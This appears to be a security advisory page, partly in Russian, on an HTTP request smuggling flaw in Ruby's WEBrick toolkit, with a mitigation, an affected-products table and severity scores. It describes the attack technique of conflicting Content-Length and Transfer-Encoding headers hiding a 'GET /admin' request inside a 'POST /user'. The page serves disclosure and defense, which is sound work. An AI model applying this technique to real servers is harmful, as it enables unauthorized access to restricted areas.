Описание
An issue was discovered in the WEBrick toolkit through 1.8.1 for Ruby. It allows HTTP request smuggling by providing both a Content-Length header and a Transfer-Encoding header, e.g., "GET /admin HTTP/1.1\r\n" inside of a "POST /user HTTP/1.1\r\n" request. NOTE: the supplier's position is "Webrick should not be used in production."
A flaw was found in the webrick toolkit. This issue occurs because the server incorrectly handles requests with both Content-Length and Transfer-Encoding headers. This can allow an attacker to sneak in an extra request such as GET /admin after the normal request POST /user. As a result, unauthorized users can access restricted areas like /admin by POST /user.
Отчет
This CVE is rated as having Moderate impact because Webrick should not be used in production. It is only still maintained because there are other gems relying on it, most of which do so only for testing, and only because it is a pure ruby implementation and it was shipped with Ruby in the past.
Меры по смягчению последствий
As a temporary workaround, avoid using WEBrick in production environments. If you must use it, ensure that your application is behind a reverse proxy that can handle request validation and filtering to mitigate the risk of HTTP request smuggling.
Затронутые пакеты
| Платформа | Пакет | Состояние | Рекомендация | Релиз |
|---|---|---|---|---|
| Red Hat 3scale API Management Platform 2 | 3scale-amp-backend-container | Will not fix | ||
| Red Hat 3scale API Management Platform 2 | 3scale-amp-system-container | Will not fix | ||
| Red Hat 3scale API Management Platform 2 | 3scale-amp-zync-container | Will not fix | ||
| Red Hat Enterprise Linux 10 | pcs | Not affected | ||
| Red Hat Enterprise Linux 9 | pcs | Not affected | ||
| Red Hat Satellite 6 | rubygem-webrick | Affected | ||
| Red Hat Satellite 6 | satellite-capsule:el8/rubygem-webrick | Affected | ||
| Red Hat Satellite 6 | satellite:el8/rubygem-webrick | Affected | ||
| RHOL-5.9-RHEL-9 | openshift-logging/cluster-logging-operator-bundle | Fixed | RHSA-2025:1227 | 12.02.2025 |
| RHOL-5.9-RHEL-9 | openshift-logging/cluster-logging-rhel9-operator | Fixed | RHSA-2025:1227 | 12.02.2025 |
Показывать по
Дополнительная информация
Статус:
EPSS
7.5 High
CVSS3
Связанные уязвимости
An issue was discovered in the WEBrick toolkit through 1.8.1 for Ruby. It allows HTTP request smuggling by providing both a Content-Length header and a Transfer-Encoding header, e.g., "GET /admin HTTP/1.1\r\n" inside of a "POST /user HTTP/1.1\r\n" request. NOTE: the supplier's position is "Webrick should not be used in production."
An issue was discovered in the WEBrick toolkit through 1.8.1 for Ruby. It allows HTTP request smuggling by providing both a Content-Length header and a Transfer-Encoding header, e.g., "GET /admin HTTP/1.1\r\n" inside of a "POST /user HTTP/1.1\r\n" request. NOTE: the supplier's position is "Webrick should not be used in production."
An issue was discovered in the WEBrick toolkit through 1.8.1 for Ruby. ...
EPSS
7.5 High
CVSS3